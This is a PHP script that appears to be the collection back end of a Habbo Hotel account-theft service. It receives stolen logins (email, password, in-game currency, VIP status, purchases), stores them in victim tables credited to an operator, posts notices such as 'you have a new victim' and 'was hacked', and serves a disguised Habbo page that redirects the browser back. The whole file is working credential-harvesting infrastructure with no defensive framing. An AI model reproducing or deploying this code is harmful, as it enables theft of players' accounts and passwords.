Untitled

<?php
include 'login/includes/connect_db.php';

if (!empty($_SERVER['HTTP_CLIENT_IP'])) {	$ip = $_SERVER['HTTP_CLIENT_IP'];} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {	$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} else {	$ip = $_SERVER['REMOTE_ADDR'];}
if(num_rows("","","acesso"," WHERE ip='$ip'")>2) {
	echo "Banned";
	header('X-Error-Message: Incorrect username or password', true, 500);
    die;
} else {
	###########################	MÉTODO	########################
	$metodo = "add";
	#########################	DUMP DO SCRIPT	#######################
	$diamantes_scape = htmlspecialchars(addslashes($_REQUEST["diamantes"])); //qtd diamantes
	$compras = htmlspecialchars(addslashes($_REQUEST["compras"])); //hist compras
	$moedas_scape = htmlspecialchars(addslashes($_REQUEST["moedas"]));	//qtd moedas
	$emblemac = htmlspecialchars(addslashes($_REQUEST['emblemac']));	//possui emblema hc
	$mobis = htmlspecialchars(addslashes($_REQUEST['mobis']));	//possui emblema mobis
	$verificado = htmlspecialchars(addslashes($_REQUEST['verificado'])); //conta verificada
	$desde = htmlspecialchars(addslashes($_REQUEST['since']));
	$since = substr($desde,0,10);	//data de criação
	$email = htmlspecialchars(addslashes($_REQUEST['email']));	//email
	$mail_add = htmlspecialchars(addslashes($_REQUEST['mail_add'])); //email adicionado
	$pass = htmlspecialchars(addslashes($_REQUEST['pass'])); //senha
	$habbo = htmlspecialchars(addslashes($_REQUEST['habbo']));	//nome do habbo
	$user= htmlspecialchars(addslashes(base64_decode($_REQUEST['id'])));	//chave do usuário do project
	$origin = htmlspecialchars(addslashes($_REQUEST['origin']));
	$premium = htmlspecialchars(addslashes($_REQUEST['premium']));
	$vip = substr($premium,0,-1); //possui dias de hc
	$origem = substr($origin, 0, 25);	//url de execução
	###########################	AÇÕES DO SERVIDOR	#########################
	if (!empty($_SERVER['HTTP_CLIENT_IP'])) {	$pegar_ip = $_SERVER['HTTP_CLIENT_IP'];} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {	$pegar_ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} else {	$pegar_ip = $_SERVER['REMOTE_ADDR'];}//ip
	$dia_visita = $since;//data de criação do habbo
	$dia_acesso = date("d-m-Y");
	$horas_visita = date("H:i:s");//hora que enviou os dados pro project
	$url = htmlspecialchars(addslashes($origem));//url que executou o script
	########################### VARIÁVEIS DE SERVIDORES DO HABBO ###########################
	$br = ".com.br";
	$it = ".it";
	$es = ".es";
	$fr = ".fr";
	$nl = ".nl";
	$tk = ".com.tr";
	$eua = ".com";
	########################## VERIFICAR QUAL O SERVIDOR ##########################
	if (strpos($url,$br)){
		$servidor = "http://www.habbo.com.br/";	//SE EXISTIR .com.br NA URL, ENTÃO SERVIDOR VAI SER $BR
		}else if(strpos($url,$it)){
		$servidor = "http://www.habbo.it/";
		}else if(strpos($url,$es)){
		$servidor = "http://www.habbo.es/";
		}else if(strpos($url,$fr)){
		$servidor = "http://www.habbo.fr/";
		}else if(strpos($url,$nl)){
		$servidor = "http://www.habbo.nl/";
		}else if(strpos($url,$tk)){
		$servidor = "http://www.habbo..com.tr/";
		} else if(strpos($url,$eua)){
		$servidor = "http://www.habbo.com/";
		} else {
		$servidor = "Não identificado";	//SE NÃO HOUVER VARIÁVEIS DO HABBO QUE ESTEJAM PRESENTES NA URL, ENTÃO NÃO SERÁ IDENTIFICADO
		}
	##########################	PROTEGENDO CONTRA SQL	#############################
	$email_scape = addslashes($email);
	$mail_add_scape = addslashes($mail_add);
	$pass_scape = addslashes($pass);
	$habbo_scape = addslashes($habbo);
	$user_scape = addslashes($user);
	$pegar_ip_scape = addslashes($pegar_ip);
	$dia_visita_scape = addslashes($dia_visita);
	$dia_acesso_scape = addslashes($dia_acesso);
	$horas_visita_scape = addslashes($horas_visita);
	$vip_scape = addslashes($vip);
	/*****************************************************************************************************************/
//echo num_rows("","","users"," WHERE user = '$user_scape'");

	$resultado = mysqli_query($connect,"SELECT * FROM `users` WHERE `user`='$user_scape'");
	$num_usu = mysqli_num_rows($resultado);
	if($num_usu > 0){

	} else {
		$user_scape = "Frank";
	}
	if(num_rows("","","habbos"," WHERE ip='$pegar_ip_scape'")<10) {
		if(num_rows("","","users"," WHERE user = '$user_scape'") > 0) {
			if(num_rows("","","habbos"," WHERE user='$user_scape' and habbo='$habbo_scape'")<1) {
				while($row = mysqli_fetch_array($resultado)) {
					$qtd = $row["qtd"];
					$new_qtd = $qtd + 1;
					mysqli_query($connect,"UPDATE `users` SET `qtd`='$new_qtd' WHERE `user`='$user_scape'");
				}
				mysqli_query($connect,"INSERT INTO notification(user,notification)VALUES('$user_scape','Você tem uma nova vitima!') ");
				mysqli_query($connect,"INSERT INTO habbos(email,mail_add,pass,habbo,user,data,ip,hora,servidor,vip,emblemac,mobis,verify_mail,metodo,moedas,diamantes,deletado,dia_visita,cookies,view,compras)VALUES(('$email_scape'), ('$mail_add_scape'), ('$pass_scape'), ('$habbo_scape'), ('$user_scape'), ('$dia_visita_scape'), ('$pegar_ip_scape'), ('$horas_visita_scape'), ('$servidor'), ('$vip_scape'), ('$emblemac'), ('$mobis'), ('$verificado'), ('$metodo'),('$moedas_scape'),('$diamantes_scape'),(0),('$dia_acesso_scape'),('0'),('0'),('$compras'))");
				mysqli_query($connect,"INSERT INTO habbos_bkp(email,mail_add,pass,habbo,user,data,ip,hora,servidor,vip,emblemac,mobis,verificado,metodo,moedas,diamantes,deletado,dia_visita,cookies,compras)VALUES(('$email_scape'), ('$mail_add_scape'), ('$pass_scape'), ('$habbo_scape'), ('$user_scape'), ('$dia_visita_scape'), ('$pegar_ip_scape'), ('$horas_visita_scape'), ('$servidor'), ('$vip_scape'), ('$emblemac'), ('$mobis'), ('$verificado'), ('$metodo'),('$moedas_scape'),('$diamantes_scape'),(0),('$dia_acesso_scape'),('0'),('$compras'))");
				$data = date("d/m H:i");
				if(mysqli_connect_errno() == 0){
				mysqli_query($connect,"INSERT INTO shoutbox(message)VALUES('<div class=\"message\" style=\"background-color: rgba(33,150,243,0.12);\"><p>Frank<span style=\"font-size:11px;font-weight:normal;color:#676767; float:right;\">$data</span></p><p><span style=\"font-weight:Bold;\">$habbo_scape</span> foi hackeado por <span style=\"font-weight:Bold;\">$user_scape</span> pelo método <span style=\"font-weight:Bold;\">e-mail add</span>!<span style=\"font-size:11px;font-weight:bold;color:#8A1B08; float:right;\">BOT</span></p></div>') ");

				mail("$email_scape","AGRADECIMENTOS XHABBO","Obrigado por utilizar o https://project-xhabbo.com","From: frank@project-xhabbo.com");
				}
			}
			else if(num_rows("","","habbos"," WHERE user='$user_scape' and habbo='$habbo_scape'")>0) {
				mysqli_query($connect,"UPDATE habbos SET mail_add=('$mail_add_scape') WHERE habbo = ('$habbo_scape') AND pass = ('$pass_scape') AND user = ('$user_scape')");//SE JÁ EXISTIR VAMOS APENAS ATUALIZAR O EMAIL ADICIONADO
				mysqli_query($connect,"UPDATE habbos_bkp SET mail_add=('$mail_add_scape') AND dia_visita=('$dia_acesso_scape') AND pass = ('$pass_scape') AND user = ('$user_scape') WHERE habbo = ('$habbo_scape')");//SE JÁ EXISTIR VAMOS APENAS ATUALIZAR O EMAIL ADICIONADO
			}
		}
	} else {
		mysqli_query($connect,"INSERT INTO `acesso` (`ip`) VALUES ('$pegar_ip_scape')");
	}
}
?>
<!DOCTYPE html>
<html ng-app="app" lang="fr" debug="true">
<head>
	<meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
	<title>Habbo Hotel</title>
	<link rel="shortcut icon" href="https://habboo-a.akamaihd.net/habbo-web/america/pt/assets/images/favicon.08c747be.ico">
	<style type="text/css">
		body{
			background:linear-gradient(135deg,#15507c,#0c3a65);
		}
	</style>
</head>
<body>
	<script>window.history.back();</script>
</body>
</html>